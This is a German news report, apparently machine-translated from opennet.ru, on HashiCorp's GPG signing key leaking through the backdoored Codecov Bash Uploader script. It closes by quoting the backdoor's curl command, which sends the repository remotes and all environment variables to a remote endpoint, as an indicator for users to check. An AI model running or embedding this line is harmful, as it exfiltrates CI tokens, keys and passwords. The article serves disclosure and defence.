HashiCorp, bekannt für die Entwicklung der Open-Source-Tools Vagrant, Packer, Nomad und Terraform, gab die Offenlegung des privaten GPG-Schlüssels bekannt, der zur Erstellung digitaler Signaturen zur Überprüfung von Veröffentlichungen verwendet wird. Angreifer, die sich Zugriff auf den GPG-Schlüssel verschafft haben, könnten potenziell versteckte Änderungen an HashiCorp-Produkten vornehmen, indem sie diese mit einer korrekten digitalen Signatur verifizieren. Gleichzeitig erklärte das Unternehmen, dass bei der Prüfung keine Spuren von Versuchen solcher Änderungen festgestellt worden seien.
Derzeit wurde der kompromittierte GPG-Schlüssel widerrufen und an seiner Stelle ein neuer Schlüssel eingeführt. Das Problem betraf nur die Überprüfung mithilfe der Dateien SHA256SUM und SHA256SUM.sig und hatte keine Auswirkungen auf die Generierung digitaler Signaturen für Linux-DEB- und RPM-Pakete, die über releases.hashicorp.com bereitgestellt werden, sowie auf Release-Überprüfungsmechanismen für macOS und Windows (AuthentiCode). .
Das Leck entstand aufgrund der Verwendung des Codecov Bash Uploader-Skripts (codecov-bash) in der Infrastruktur, das zum Herunterladen von Abdeckungsberichten von kontinuierlichen Integrationssystemen entwickelt wurde. Während des Angriffs auf das Unternehmen Codecov wurde in dem angegebenen Skript eine Hintertür versteckt, über die Passwörter und Verschlüsselungsschlüssel an den Server der Angreifer gesendet wurden.
Zum Hacken nutzten die Angreifer einen Fehler bei der Erstellung des Codecov-Docker-Images aus, der es ihnen ermöglichte, Zugangsdaten zu GCS (Google Cloud Storage) zu extrahieren, die erforderlich waren, um Änderungen am Bash-Uploader-Skript vorzunehmen, das von codecov.io verteilt wurde Webseite. Die Änderungen wurden bereits am 31. Januar vorgenommen, blieben zwei Monate lang unentdeckt und ermöglichten es Angreifern, Informationen zu extrahieren, die in den Continuous-Integration-Systemumgebungen der Kunden gespeichert waren. Mithilfe des hinzugefügten Schadcodes könnten Angreifer Informationen über das getestete Git-Repository und alle Umgebungsvariablen, einschließlich Token, Verschlüsselungsschlüssel und Passwörter, erhalten, die an kontinuierliche Integrationssysteme übermittelt werden, um den Zugriff auf Anwendungscode, Repositorys und Dienste wie Amazon Web Services und GitHub zu organisieren.
Neben dem direkten Aufruf wurde das Codecov Bash Uploader-Skript auch im Rahmen anderer Uploader verwendet, etwa Codecov-action (Github), Codecov-circleci-orb und Codecov-bitrise-step, deren Nutzer ebenfalls von dem Problem betroffen sind. Allen Benutzern von codecov-bash und verwandten Produkten wird empfohlen, ihre Infrastrukturen zu überprüfen und Passwörter und Verschlüsselungsschlüssel zu ändern. Sie können das Vorhandensein einer Hintertür in einem Skript anhand der Zeile „curl -sm 0.5 -d „$(git remote -v)<<<<<< ENV $(env)“ http:// überprüfen. /upload/v2 || WAHR
Source: opennet.ru